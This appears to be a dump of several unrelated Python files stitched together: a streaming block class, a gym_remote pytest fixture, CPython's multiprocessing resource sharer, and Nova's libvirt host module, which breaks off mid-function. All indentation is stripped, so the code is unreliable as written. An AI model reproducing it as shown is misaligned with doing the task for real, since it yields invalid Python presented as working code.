self._send_sink_signal(reip.CLOSE)
def terminate(self, propagate=False):
if self._stream is not None:
self._stream.terminate()
if propagate:
self._send_sink_signal(reip.TERMINATE)
@property
def error(self):
return self._exception is not None
# XXX: this is temporary. idk how to elegantly handle this
@property
def running(self):
return self._stream.running if self._stream is not None else False
# @property
# def closed(self):
# return self._stream.should_wait if self._stream is not None else True
@property
def terminated(self):
return self._terminated or (self._stream.terminated if self._stream is not None else False)
@terminated.setter
def terminated(self, value):
self._terminated = value
# debug
def short_str(self):
return '[B({})[{}/{}]({})]'.format(
self.name, len(self.sources), len(self.sinks),
self.block_state_name)
def stats(self):
total_time = self._sw.stats().sum if '' in self._sw else 0
init_time = self._sw.stats("init").sum if 'init' in self._sw else 0
finish_time = self._sw.stats("finish").sum if 'finish' in self._sw else 0
return {
'name': self.name,
'total_time': total_time,
'processed': self.processed,
'speed': self.processed / (total_time - init_time - finish_time) if total_time else 0,
'dropped': [getattr(s, "dropped", None) for s in self.sinks],
'skipped': [getattr(s, "skipped", None) for s in self.sources],
'n_in_sources': [len(s) if s is not None else None for s in self.sources],
'n_in_sinks': [len(s) if s is not None else None for s in self.sinks],
'sw': self._sw,
'exception': self._exception,
'all_exceptions': self._except._groups,
}
def summary(self):
return text.block_text(
text.green(str(self)),
'Sources:',
text.indent(text.b_(*(f'- {s}' for s in self.sources)) or None, w=4)[2:],
'',
'Sinks:',
text.indent(text.b_(*(f'- {s}' for s in self.sinks)) or None, w=4)[2:],
ch=text.blue('*'), n=40,
)
def status(self):
'''
e.g. `Block_123 + 2 buffers (2.09 x/s), 9 total (1.47 x/s avg), sources=[1], sinks=[0]`
'''
n = self.processed
total_time = self._sw.elapsed()
init_time = self._sw.stats("init").sum if 'init' in self._sw else 0
speed_avg = n / (total_time - init_time)
n_new = n - self.old_processed
speed_now = n_new / (time.time() - self.old_time)
self.old_processed, self.old_time = n, time.time()
n_src = [len(s) for s in self.sources]
n_snk = [len(s) for s in self.sinks]
return f'{self.name}\t + {n_new:3} buffers ({speed_now:,.2f} x/s), {n:5} total ({speed_avg:,.2f} x/s avg), sources={n_src}, sinks={n_snk}'
def stats_summary(self):
stats = self.stats()
# return text.block_text(
return text.b_(
# block title
'\nStats for {summary_banner}',
# any exception, if one was raised.
text.red('({}) {}'.format(type(self._exception).__name__, self._exception))
if self._exception else None,
# basic stats
'Processed {processed} buffers in {total_time:.2f} sec. ({speed:.2f} x/s)',
'Dropped: {dropped} Skipped: {skipped} Left in Queue: in={n_in_sources} out={n_in_sinks}',
# timing info
# self._sw, ch=text.blue('*')).format(
self._sw).format(
summary_banner=text.red(self) if self.error else text.green(self),
**stats)
# def print_stats(self):
# print(self.stats_summary())
def prepare_output(outputs, input_meta=None, expected_length=None):
'''Take the inputs from block.process and prepare to be passed to block.sinks.'''
if not outputs:
return (), {}
bufs, meta = None, None
if isinstance(outputs, tuple):
if len(outputs) == 2:
bufs, meta = outputs
elif isinstance(outputs, (Meta, dict)):
meta = outputs
bufs = list(bufs) if bufs else []
if expected_length: # pad outputs with blank values
bufs.extend((reip.BLANK,) * max(0, expected_length - len(bufs)))
if input_meta: # merge meta as a new layer
if isinstance(meta, Meta): # only the user did not wish to override it
meta = Meta(meta, input_meta)
else:
meta = Meta(meta)
return bufs, meta or Meta()
|
__init__.py
|
import multiprocessing
import pytest
import tempfile
from gym_remote.client import RemoteEnv
from gym_remote.server import RemoteEnvWrapper
@pytest.fixture(scope='function')
def tempdir():
with tempfile.TemporaryDirectory() as dir:
yield dir
@pytest.fixture(scope='function')
def process_wrapper():
with tempfile.TemporaryDirectory() as dir:
def serve(pipe):
make_env = pipe.recv()
env = RemoteEnvWrapper(make_env(), dir)
pipe.send('ok')
args = pipe.recv()
kwargs = pipe.recv()
env.serve(*args, **kwargs)
parent_pipe, child_pipe = multiprocessing.Pipe()
proc = multiprocessing.Process(target=serve, args=(child_pipe,))
proc.start()
def call(env, *args, **kwargs):
parent_pipe.send(env)
assert parent_pipe.recv() == 'ok'
parent_pipe.send(args)
parent_pipe.send(kwargs)
return RemoteEnv(dir)
yield call
proc.terminate()
|
resource_sharer.py
|
#
# We use a background thread for sharing fds on Unix, and for sharing sockets on
# Windows.
#
# A client which wants to pickle a resource registers it with the resource
# sharer and gets an identifier in return. The unpickling process will connect
# to the resource sharer, sends the identifier and its pid, and then receives
# the resource.
#
import os
import signal
import socket
import sys
import threading
from . import process
from .context import reduction
from . import util
__all__ = ['stop']
if sys.platform == 'win32':
__all__ += ['DupSocket']
class DupSocket(object):
'''Picklable wrapper for a socket.'''
def __init__(self, sock):
new_sock = sock.dup()
def send(conn, pid):
share = new_sock.share(pid)
conn.send_bytes(share)
self._id = _resource_sharer.register(send, new_sock.close)
def detach(self):
'''Get the socket. This should only be called once.'''
with _resource_sharer.get_connection(self._id) as conn:
share = conn.recv_bytes()
return socket.fromshare(share)
else:
__all__ += ['DupFd']
class DupFd(object):
'''Wrapper for fd which can be used at any time.'''
def __init__(self, fd):
new_fd = os.dup(fd)
def send(conn, pid):
reduction.send_handle(conn, new_fd, pid)
def close():
os.close(new_fd)
self._id = _resource_sharer.register(send, close)
def detach(self):
'''Get the fd. This should only be called once.'''
with _resource_sharer.get_connection(self._id) as conn:
return reduction.recv_handle(conn)
class _ResourceSharer(object):
'''Manager for resources using background thread.'''
def __init__(self):
self._key = 0
self._cache = {}
self._old_locks = []
self._lock = threading.Lock()
self._listener = None
self._address = None
self._thread = None
util.register_after_fork(self, _ResourceSharer._afterfork)
def register(self, send, close):
'''Register resource, returning an identifier.'''
with self._lock:
if self._address is None:
self._start()
self._key += 1
self._cache[self._key] = (send, close)
return (self._address, self._key)
@staticmethod
def get_connection(ident):
'''Return connection from which to receive identified resource.'''
from .connection import Client
address, key = ident
c = Client(address, authkey=process.current_process().authkey)
c.send((key, os.getpid()))
return c
def stop(self, timeout=None):
'''Stop the background thread and clear registered resources.'''
from .connection import Client
with self._lock:
if self._address is not None:
c = Client(self._address,
authkey=process.current_process().authkey)
c.send(None)
c.close()
self._thread.join(timeout)
if self._thread.is_alive():
util.sub_warning('_ResourceSharer thread did '
'not stop when asked')
self._listener.close()
self._thread = None
self._address = None
self._listener = None
for key, (send, close) in self._cache.items():
close()
self._cache.clear()
def _afterfork(self):
for key, (send, close) in self._cache.items():
close()
self._cache.clear()
# If self._lock was locked at the time of the fork, it may be broken
# -- see issue 6721. Replace it without letting it be gc'ed.
self._old_locks.append(self._lock)
self._lock = threading.Lock()
if self._listener is not None:
self._listener.close()
self._listener = None
self._address = None
self._thread = None
def _start(self):
from .connection import Listener
assert self._listener is None, "Already have Listener"
util.debug('starting listener and thread for sending handles')
self._listener = Listener(authkey=process.current_process().authkey)
self._address = self._listener.address
t = threading.Thread(target=self._serve)
t.daemon = True
t.start()
self._thread = t
def _serve(self):
if hasattr(signal, 'pthread_sigmask'):
signal.pthread_sigmask(signal.SIG_BLOCK, signal.valid_signals())
while 1:
try:
with self._listener.accept() as conn:
msg = conn.recv()
if msg is None:
break
key, destination_pid = msg
send, close = self._cache.pop(key)
try:
send(conn, destination_pid)
finally:
close()
except:
if not util.is_exiting():
sys.excepthook(*sys.exc_info())
_resource_sharer = _ResourceSharer()
stop = _resource_sharer.stop
|
host.py
|
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
# Copyright (c) 2010 Citrix Systems, Inc.
# Copyright (c) 2011 Piston Cloud Computing, Inc
# Copyright (c) 2012 University Of Minho
# (c) Copyright 2013 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Manages information about the host OS and hypervisor.
This class encapsulates a connection to the libvirt
daemon and provides certain higher level APIs around
the raw libvirt API. These APIs are then used by all
the other libvirt related classes
"""
import operator
import os
import socket
import sys
import threading
from eventlet import greenio
from eventlet import greenthread
from eventlet import patcher
from eventlet import tpool
from oslo_config import cfg
from oslo_log import log as logging
from oslo_utils import excutils
from oslo_utils import importutils
from oslo_utils import units
from oslo_utils import versionutils
import six
from nova import context as nova_context
from nova import exception
from nova.i18n import _
from nova.i18n import _LE
from nova.i18n import _LI
from nova.i18n import _LW
from nova import rpc
from nova import utils
from nova.virt import event as virtevent
from nova.virt.libvirt import config as vconfig
from nova.virt.libvirt import guest as libvirt_guest
libvirt = None
LOG = logging.getLogger(__name__)
native_socket = patcher.original('socket')
native_threading = patcher.original("threading")
native_Queue = patcher.original("Queue" if six.PY2 else "queue")
CONF = cfg.CONF
CONF.import_opt('host', 'nova.netconf')
CONF.import_opt('my_ip', 'nova.netconf')
# This list is for libvirt hypervisor drivers that need special handling.
# This is *not* the complete list of supported hypervisor drivers.
HV_DRIVER_QEMU = "QEMU"
HV_DRIVER_XEN = "Xen"
class DomainJobInfo(object):
"""Information about libvirt background jobs
This class encapsulates information about libvirt
background jobs. It provides a mapping from either
the old virDomainGetJobInfo API which returned a
fixed list of fields, or the modern virDomainGetJobStats
which returns an extendable dict of fields.
"""
_have_job_stats = True
def __init__(self, **kwargs):
self.type = kwargs.get("type", libvirt.VIR_DOMAIN_JOB_NONE)
self.time_elapsed = kwargs.get("time_elapsed", 0)
self.time_remaining = kwargs.get("time_remaining", 0)
self.downtime = kwargs.get("downtime", 0)
self.setup_time = kwargs.get("setup_time", 0)
self.data_total = kwargs.get("data_total", 0)
self.data_processed = kwargs.get("data_processed", 0)
self.data_remaining = kwargs.get("data_remaining", 0)
self.memory_total = kwargs.get("memory_total", 0)
self.memory_processed = kwargs.get("memory_processed", 0)
self.memory_remaining = kwargs.get("memory_remaining", 0)
self.memory_constant = kwargs.get("memory_constant", 0)
self.memory_normal = kwargs.get("memory_normal", 0)
self.memory_normal_bytes = kwargs.get("memory_normal_bytes", 0)
self.memory_bps = kwargs.get("memory_bps", 0)
self.disk_total = kwargs.get("disk_total", 0)
self.disk_processed = kwargs.get("disk_processed", 0)
self.disk_remaining = kwargs.get("disk_remaining", 0)
self.disk_bps = kwargs.get("disk_bps", 0)
self.comp_cache = kwargs.get("compression_cache", 0)
self.comp_bytes = kwargs.get("compression_bytes", 0)
self.comp_pages = kwargs.get("compression_pages", 0)
self.comp_cache_misses = kwargs.get("compression_cache_misses", 0)
self.comp_overflow = kwargs.get("compression_overflow", 0)
@classmethod
def _get_job_stats_compat(cls, dom):
# Make the old virDomainGetJobInfo method look similar to the
# modern virDomainGetJobStats method
try:
info = dom.jobInfo()
except libvirt.libvirtError as ex:
# When migration of a transient guest completes, the guest
# goes away so we'll see NO_DOMAIN error code
#
# When migration of a persistent guest completes, the guest
# merely shuts off, but libvirt unhelpfully raises an
# OPERATION_INVALID error code
#
# Lets pretend both of these mean success
if ex.get_error_code() in (libvirt.VIR_ERR_NO_DOMAIN,
libvirt.VIR_ERR_OPERATION_INVALID):
LOG.debug("Domain has shutdown/gone away: %s", ex)
return cls(type=libvirt.VIR_DOMAIN_JOB_COMPLETED)
else:
LOG.debug("Failed to get job info: %s", ex)
raise
return cls(
type=info[0],
time_elapsed=info[1],
time_remaining=info[2],
data_total=info[3],
data_processed=info[4],
data_remaining=info[5],
memory_total=info[6],
memory_processed=info[7],
memory_remaining=info[8],
disk_total=info[9],
disk_processed=info[10],
disk_remaining=info[11])
@classmethod
def for_domain(cls, dom):
'''Get job info for the domain
Query the libvirt job info for the domain (ie progress
of migration, or snapshot operation)
Returns: a DomainJobInfo instance
'''
if cls._have_job_stats:
try:
stats = dom.jobStats()
return cls(**stats)
except libvirt.libvirtError as ex:
if ex.get_error_code() == libvirt.VIR_ERR_NO_SUPPORT:
# Remote libvirt doesn't support new API
LOG.debug("Missing remote virDomainGetJobStats: %s", ex)
cls._have_job_stats = False
return cls._get_job_stats_compat(dom)
elif ex.get_error_code() in (
libvirt.VIR_ERR_NO_DOMAIN,
libvirt.VIR_ERR_OPERATION_INVALID):
# Transient guest finished migration, so it has gone
# away completely
LOG.debug("Domain has shutdown/gone away: %s", ex)
return cls(type=libvirt.VIR_DOMAIN_JOB_COMPLETED)
else:
LOG.debug("Failed to get job stats: %s", ex)
raise
except AttributeError as ex:
# Local python binding doesn't support new API
LOG.debug("Missing local virDomainGetJobStats: %s", ex)
cls._have_job_stats = False
return cls._get_job_stats_compat(dom)
else:
return cls._get_job_stats_compat(dom)
class Host(object):
def __init__(self, uri, read_only=False,
conn_event_handler=None,
lifecycle_event_handler=None):
global libvirt
if libvirt is None:
libvirt = importutils.import_module('libvirt')
self._uri = uri
self._read_only = read_only
self._conn_event_handler = conn_event_handler
self._lifecycle_event_handler = lifecycle_event_handler
self._skip_list_all_domains = False
self._caps = None
self._hostname = None
self._wrapped_conn = None
self._wrapped_conn_lock = threading.Lock()
self._event_queue = None
self._events_delayed = {}
# Note(toabctl): During a reboot of a domain, STOPPED and
# STARTED events are sent. To prevent shutting
# down the domain during a reboot, delay the
# STOPPED lifecycle event some seconds.
self._lifecycle_delay = 15
def _native_thread(self):
"""Receives async events coming in from libvirtd.
This is a native thread which runs the default
libvirt event loop implementation. This processes
any incoming async events from libvirtd and queues
them for later dispatch. This thread is only
permitted to use libvirt python APIs, and the
driver.queue_event method. In particular any use
of logging is forbidden, since it will confuse
eventlet's greenthread integration
"""
while True:
libvirt.virEventRunDefaultImpl()
def _dispatch_thread(self):
"""Dispatches async events coming in from libvirtd.
This is a green thread which waits for events to
arrive from the libvirt event loop thread. This
then dispatches the events to the compute manager.
"""
while True:
self._dispatch_events()
@staticmethod
def _event_lifecycle_callback(conn, dom, event, detail, opaque):
"""Receives lifecycle events from libvirt.
NB: this method is executing in a native thread, not
an eventlet coroutine. It can only invoke other libvirt
APIs, or use self._queue_event(). Any use of logging APIs
in particular is forbidden.
"""
self = opaque
uuid = dom.UUIDString()
transition = None
if event == libvirt.VIR_DOMAIN_EVENT_STOPPED:
transition = virtevent.EVENT_LIFECYCLE_STOPPED
elif event == libvirt.VIR_DOMAIN_EVENT_STARTED:
transition = virtevent.EVENT_LIFECYCLE_STARTED
elif event == libvirt.VIR_DOMAIN_EVENT_SUSPENDED:
transition = virtevent.EVENT_LIFECYCLE_PAUSED
elif event == libvirt.VIR_DOMAIN_EVENT_RESUMED:
transition = virtevent.EVENT_LIFECYCLE_RESUMED
if transition is not None:
self._queue_event(virtevent.LifecycleEvent(uuid, transition))
def _close_callback(self, conn, reason, opaque):
close_info = {'conn': conn, 'reason': reason}
self._queue_event(close_info)
@staticmethod
def _test_connection(conn):
try:
conn.getLibVersion()
return True
except libvirt.libvirtError as e:
if (e.get_error_code() in (libvirt.VIR_ERR_SYSTEM_ERROR,
libvirt.VIR_ERR_INTERNAL_ERROR) and
e.get_error_domain() in (libvirt.VIR_FROM_REMOTE,
libvirt.VIR_FROM_RPC)):
LOG.debug('Connection to libvirt broke')
return False
raise
@staticmethod
def _connect_auth_cb(creds, opaque):
if len(creds) == 0:
return 0
raise exception.NovaException(
_("Can not handle authentication request for %d credentials")
% len(creds))
@staticmethod
def _connect(uri, read_only):
auth = [[libvirt.VIR_CRED_AUTHNAME,
libvirt.VIR_CRED_ECHOPROMPT,
libvirt.VIR_CRED_REALM,
libvirt.VIR_CRED_PASSPHRASE,
libvirt.VIR_CRED_NOECHOPROMPT,
libvirt.VIR_CRED_EXTERNAL],
Host._connect_auth_cb,
None]
flags = 0
if read_only:
flags = libvirt.VIR_CONNECT_RO
# tpool.proxy_call creates a native thread. Due to limitations
# with eventlet locking we cannot use the logging API inside
# the called function.
return tpool.proxy_call(
(libvirt.virDomain, libvirt.virConnect),
libvirt.openAuth, uri, auth, flags)
def _queue_event(self, event):
"""Puts an event on the queue for dispatch.
This method is called by the native event thread to
put events on the queue for later dispatch by the
green thread. Any use of logging APIs is forbidden.
"""
if self._event_queue is None:
return
# Queue the event...
self._event_queue.put(event)
# ...then wakeup the green thread to dispatch it
c = ' '.encode()
self._event_notify_send.write(c)
self._event_notify_send.flush()
def _dispatch_events(self):
"""Wait for & dispatch events from native thread
Blocks until native thread indicates some events
are ready. Then dispatches all queued events.
"""
# Wait to be notified that there are some
# events pending
try:
_c = self._event_notify_recv.read(1)
assert _c
except ValueError:
return # will be raised when pipe is closed
# Process as many events as possible without
# blocking
last_close_event = None
while not self._event_queue.empty():
try:
event = self._event_queue.get(block=False)
if isinstance(event, virtevent.LifecycleEvent):
# call possibly with delay
self._event_emit_delayed(event)
elif 'conn' in event and 'reason' in event:
last_close_event = event
except native_Queue.Empty:
pass
if last_close_event is None:
return
conn = last_close_event['conn']
# get_new_connection may already have disabled the host,
# in which case _wrapped_conn is None.
with self._wrapped_conn_lock:
if conn == self._wrapped_conn:
reason = str(last_close_event['reason'])
msg = _("Connection to libvirt lost: %s") % reason
self._wrapped_conn = None
if self._conn_event_handler is not None:
self._conn_event_handler(False, msg)
def _event_emit_delayed(self, event):
"""Emit events - possibly delayed."""
def event_cleanup(gt, *args, **kwargs):
"""Callback function for greenthread. Called
to cleanup the _events_delayed dictionary when an event
was called.
"""
event = args[0]
self._events_delayed.pop(event.uuid, None)
# Cleanup possible delayed stop events.
if event.uuid in self._events_delayed.keys():
self._events_delayed[event.uuid].cancel()
self._events_delayed.pop(event.uuid, None)
LOG.debug("Removed pending event for %s due to "
"lifecycle event", event.uuid)
if event.transition == virtevent.EVENT_LIFECYCLE_STOPPED:
# Delay STOPPED event, as they may be followed by a STARTED
# event in case the instance is rebooting
id_ = greenthread.spawn_after(self._lifecycle_delay,
self._event_emit, event)
self._events_delayed[event.uuid] = id_
# add callback to cleanup self._events_delayed dict after
# event was called
id_.link(event_cleanup, event)
else:
self._event_emit(event)
def _event_emit(self, event):
if self._lifecycle_event_handler is not None:
self._lifecycle_event_handler(event)
def _init_events_pipe(self):
"""Create a self-pipe for the native thread to synchronize on.
This code is taken from the eventlet tpool module, under terms
of the Apache License v2.0.
"""
self._event_queue = native_Queue.Queue()
try:
rpipe, wpipe = os.pipe()
self._event_notify_send = greenio.GreenPipe(wpipe, 'wb', 0)
self._event_notify_recv = greenio.GreenPipe(rpipe, 'rb', 0)
except (ImportError, NotImplementedError):
# This is Windows compatibility -- use a socket instead
# of a pipe because pipes don't really exist on Windows.
sock = native_socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(('localhost', 0))
sock.listen(50)
csock = native_socket.socket(socket.AF_INET, socket.SOCK_STREAM)
csock.connect(('localhost', sock.getsockname()[1]))
nsock, addr = sock.accept()
self._event_notify_send = nsock.makefile('wb', 0)
gsock = greenio.GreenSocket(csock)
self._event_notify_recv = gsock.makefile('rb', 0)
def _init_events(self):
"""Initializes the libvirt events subsystem.
This requires running a native thread to provide the
libvirt event loop integration. This forwards events
to a green thread which does the actual dispatching.
"""
self._init_events_pipe()
LOG.debug("Starting native event thread")
self._event_thread = native_threading.Thread(
target=self._native_thread)
self._event_thread.setDaemon(True)
self._event_thread.start()
LOG.debug("Starting green dispatch thread")
utils.spawn(self._dispatch_thread)
def _get_new_connection(self):
# call with _wrapped_conn_lock held
LOG.debug('Connecting to libvirt: %s', self._uri)
wrapped_conn = None
try:
wrapped_conn = self._connect(self._uri, self._read_only)
finally:
# Enabling the compute service, in case it was disabled
# since the connection was successful.
disable_reason = None
if not wrapped_conn:
disable_reason = 'Failed to connect to libvirt'
if self._conn_event_handler is not None:
self._conn_event_handler(bool(wrapped_conn), disable_reason)
self._wrapped_conn = wrapped_conn
try:
LOG.debug("Registering for lifecycle events %s", self)
wrapped_conn.domainEventRegisterAny(
None,
libvirt.VIR_DOMAIN_EVENT_ID_LIFECYCLE,
self._event_lifecycle_callback,
self)
except Exception as e:
LOG.warn(_LW("URI %(uri)s does not support events: %(error)s"),
{'uri': self._uri, 'error': e})
try:
LOG.debug("Registering for connection events: %s", str(self))
wrapped_conn.registerCloseCallback(self._close_callback, None)
except (TypeError, AttributeError) as e:
# NOTE: The registerCloseCallback of python-libvirt 1.0.1+
# is defined with 3 arguments, and the above registerClose-
# Callback succeeds. However, the one of python-libvirt 1.0.0
# is defined with 4 arguments and TypeError happens here.
# Then python-libvirt 0.9 does not define a method register-
# CloseCallback.
LOG.debug("The version of python-libvirt does not support "
"registerCloseCallback or is too old: %s", e)
except libvirt.libvirtError as e:
LOG.warn(_LW("URI %(uri)s does not support connection"
" events: %(error)s"),
{'uri': self._uri, 'error': e})
return wrapped_conn
def _get_connection(self):
# multiple concurrent connections are protected by _wrapped_conn_lock
with self._wrapped_conn_lock:
wrapped_conn = self._wrapped_conn
if not wrapped_conn or not self._test_connection(wrapped_conn):
wrapped_conn = self._get_new_connection()
return wrapped_conn
def get_connection(self):
"""Returns a connection to the hypervisor
This method should be used to create and return a well
configured connection to the hypervisor.
:returns: a libvirt.virConnect object
"""
try:
conn = self._get_connection()
except libvirt.libvirtError as ex:
LOG.exception(_LE("Connection to libvirt failed: %s"), ex)
payload = dict(ip=CONF.my_ip,
method='_connect',
reason=ex)
rpc.get_notifier('compute').error(nova_context.get_admin_context(),
'compute.libvirt.error',
payload)
raise exception.HypervisorUnavailable(host=CONF.host)
return conn
@staticmethod
def _libvirt_error_handler(context, err):
# Just ignore instead of default outputting to stderr.
pass
def initialize(self):
# NOTE(dkliban): Error handler needs to be registered before libvirt
# connection is used for the first time. Otherwise, the
# handler does not get registered.
libvirt.registerErrorHandler(self._libvirt_error_handler, None)
libvirt.virEventRegisterDefaultImpl()
self._init_events()
self._initialized = True
def _version_check(self, lv_ver=None, hv_ver=None, hv_type=None,
op=operator.lt):
"""Check libvirt version, hypervisor version, and hypervisor type
:param hv_type: hypervisor driver from the top of this file.
"""
conn = self.get_connection()
try:
if lv_ver is not None:
libvirt_version = conn.getLibVersion()
if op(libvirt_version,
versionutils.convert_version_to_int(lv_ver)):
return False
if hv_ver is not None:
hypervisor_version = conn.getVersion()
if op(hypervisor_version,
versionutils.convert_version_to_int(hv_ver)):
return False
if hv_type is not None:
hypervisor_type = conn.getType()
if hypervisor_type != hv_type:
return False
return True
except Exception:
return False
def has_min_version(self, lv_ver=None, hv_ver=None, hv_type=None):
return self._version_check(
lv_ver=lv_ver, hv_ver=hv_ver, hv_type=hv_type, op=operator.lt)
def has_version(self, lv_ver=None, hv_ver=None, hv_type=None):
return self._version_check(
lv_ver=lv_ver, hv_ver=hv_ver, hv_type=hv_type, op=operator.ne)
# TODO(sahid): needs to be private
def get_domain(self, instance):
"""Retrieve libvirt domain object for an instance.
:param instance: an nova.objects.Instance object
Attempt to lookup the libvirt domain objects
corresponding to the Nova instance, based on
its name. If not found it will raise an
exception.InstanceNotFound exception. On other
errors, it will raise an exception.NovaException
exception.
:returns: a libvirt.Domain object
"""
return self._get_domain_by_name(instance.name)
def get_guest(self, instance):
"""Retrieve libvirt domain object for an instance.
:param instance: an nova.objects.Instance object
:returns: a nova.virt.libvirt.Guest object
"""
return libvirt_guest.Guest(
self.get_domain(instance))
def _get_domain_by_id(self, instance_id):
"""Retrieve libvirt domain object given an instance id.
All libvirt error handling should be handled in this method and
relevant nova exceptions should be raised in response.
"""
try:
conn = self.get_connection()
return conn.lookupByID(instance_id)
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
if error_code == libvirt.VIR_ERR_NO_DOMAIN:
raise exception.InstanceNotFound(instance_id=instance_id)
msg = (_("Error from libvirt while looking up %(instance_id)s: "
"[Error Code %(error_code)s] %(ex)s")
% {'instance_id': instance_id,
'error_code': error_code,
'ex': ex})
raise exception.NovaException(msg)
def _get_domain_by_name(self, instance_name):
"""Retrieve libvirt domain object given an instance name.
All libvirt error handling should be handled in this method and
relevant nova exceptions should be raised in response.
"""
try:
conn = self.get_connection()
return conn.lookupByName(instance_name)
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
if error_code == libvirt.VIR_ERR_NO_DOMAIN:
raise exception.InstanceNotFound(instance_id=instance_name)
msg = (_('Error from libvirt while looking up %(instance_name)s: '
'[Error Code %(error_code)s] %(ex)s') %
{'instance_name': instance_name,
'error_code': error_code,
'ex': ex})
raise exception.NovaException(msg)
def _list_instance_domains_fast(self, only_running=True):
# The modern (>= 0.9.13) fast way - 1 single API call for all domains
flags = libvirt.VIR_CONNECT_LIST_DOMAINS_ACTIVE
if not only_running:
flags = flags | libvirt.VIR_CONNECT_LIST_DOMAINS_INACTIVE
return self.get_connection().listAllDomains(flags)
def _list_instance_domains_slow(self, only_running=True):
# The legacy (< 0.9.13) slow way - O(n) API call for n domains
uuids = []
doms = []
# Redundant numOfDomains check is for libvirt bz #836647
if self.get_connection().numOfDomains() > 0:
for id in self.get_connection().listDomainsID():
try:
dom = self._get_domain_by_id(id)
doms.append(dom)
uuids.append(dom.UUIDString())
except exception.InstanceNotFound:
continue
if only_running:
return doms
for name in self.get_connection().listDefinedDomains():
try:
dom = self._get_domain_by_name(name)
if dom.UUIDString() not in uuids:
doms.append(dom)
except exception.InstanceNotFound:
continue
return doms
def list_guests(self, only_running=True, only_guests=True):
"""Get a list of Guest objects for nova instances
:param only_running: True to only return running instances
:param only_guests: True to filter out any host domain (eg Dom-0)
See method "list_instance_domains" for more information.
:returns: list of Guest objects
"""
return [libvirt_guest.Guest(dom) for dom in self.list_instance_domains(
only_running=only_running, only_guests=only_guests)]
def list_instance_domains(self, only_running=True, only_guests=True):
"""Get a list of libvirt.Domain objects for nova instances
:param only_running: True to only return running instances
:param only_guests: True to filter out any host domain (eg Dom-0)
Query libvirt to a get a list of all libvirt.Domain objects
that correspond to nova instances. If the only_running parameter
is true this list will only include active domains, otherwise
inactive domains will be included too. If the only_guests parameter
is true the list will have any "host" domain (aka Xen Domain-0)
filtered out.
:returns: list of libvirt.Domain objects
"""
if not self._skip_list_all_domains:
try:
alldoms = self._list_instance_domains_fast(only_running)
except (libvirt.libvirtError, AttributeError) as ex:
LOG.info(_LI("Unable to use bulk domain list APIs, "
"falling back to slow code path: %(ex)s"),
{'ex': ex})
self._skip_list_all_domains = True
if self._skip_list_all_domains:
# Old libvirt, or a libvirt driver which doesn't
# implement the new API
alldoms = self._list_instance_domains_slow(only_running)
doms = []
for dom in alldoms:
if only_guests and dom.ID() == 0:
continue
doms.append(dom)
return doms
def get_online_cpus(self):
"""Get the set of CPUs that are online on the host
Method is only used by NUMA code paths which check on
libvirt version >= 1.0.4. getCPUMap() was introduced in
libvirt 1.0.0.
:returns: set of online CPUs, raises libvirtError on error
"""
(cpus, cpu_map, online) = self.get_connection().getCPUMap()
online_cpus = set()
for cpu in range(cpus):
if cpu_map[cpu]:
online_cpus.add(cpu)
return online_cpus
def get_capabilities(self):
"""Returns the host capabilities information
Returns an instance of config.LibvirtConfigCaps representing
the capabilities of the host.
Note: The result is cached in the member attribute _caps.
:returns: a config.LibvirtConfigCaps object
"""
if not self._caps:
xmlstr = self.get_connection().getCapabilities()
LOG.info(_LI("Libvirt host capabilities %s"), xmlstr)
self._caps = vconfig.LibvirtConfigCaps()
self._caps.parse_str(xmlstr)
# NOTE(mriedem): Don't attempt to get baseline CPU features
# if libvirt can't determine the host cpu model.
if (hasattr(libvirt, 'VIR_CONNECT_BASELINE_CPU_EXPAND_FEATURES')
and self._caps.host.cpu.model is not None):
try:
features = self.get_connection().baselineCPU(
[self._caps.host.cpu.to_xml()],
libvirt.VIR_CONNECT_BASELINE_CPU_EXPAND_FEATURES)
# FIXME(wangpan): the return value of baselineCPU should be
# None or xml string, but libvirt has a bug
# of it from 1.1.2 which is fixed in 1.2.0,
# this -1 checking should be removed later.
if features and features != -1:
cpu = vconfig.LibvirtConfigCPU()
cpu.parse_str(features)
self._caps.host.cpu.features = cpu.features
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
if error_code == libvirt.VIR_ERR_NO_SUPPORT:
LOG.warn(_LW("URI %(uri)s does not support full set"
" of host capabilities: %(error)s"),
{'uri': self._uri, 'error': ex})
else:
raise
return self._caps
def get_driver_type(self):
"""Get hypervisor type.
:returns: hypervisor type (ex. qemu)
"""
return self.get_connection().getType()
def get_version(self):
"""Get hypervisor version.
:returns: hypervisor version (ex. 12003)
"""
return self.get_connection().getVersion()
def get_hostname(self):
"""Returns the hostname of the hypervisor."""
hostname = self.get_connection().getHostname()
if self._hostname is None:
self._hostname = hostname
elif hostname != self._hostname:
LOG.error(_LE('Hostname has changed from %(old)s '
'to %(new)s. A restart is required to take effect.'),
{'old': self._hostname,
'new': hostname})
return self._hostname
def find_secret(self, usage_type, usage_id):
"""Find a secret.
usage_type: one of 'iscsi', 'ceph', 'rbd' or 'volume'
usage_id: name of resource in secret
"""
if usage_type == 'iscsi':
usage_type_const = libvirt.VIR_SECRET_USAGE_TYPE_ISCSI
elif usage_type in ('rbd', 'ceph'):
usage_type_const = libvirt.VIR_SECRET_USAGE_TYPE_CEPH
elif usage_type == 'volume':
usage_type_const = libvirt.VIR_SECRET_USAGE_TYPE_VOLUME
else:
msg = _("Invalid usage_type: %s")
raise exception.NovaException(msg % usage_type)
try:
conn = self.get_connection()
return conn.secretLookupByUsage(usage_type_const, usage_id)
except libvirt.libvirtError as e:
if e.get_error_code() == libvirt.VIR_ERR_NO_SECRET:
return None
def create_secret(self, usage_type, usage_id, password=None):
"""Create a secret.
:param usage_type: one of 'iscsi', 'ceph', 'rbd' or 'volume'
'rbd' will be converted to 'ceph'.
:param usage_id: name of resource in secret
:param password: optional secret value to set
"""
secret_conf = vconfig.LibvirtConfigSecret()
secret_conf.ephemeral = False
secret_conf.private = False
secret_conf.usage_id = usage_id
if usage_type in ('rbd', 'ceph'):
secret_conf.usage_type = 'ceph'
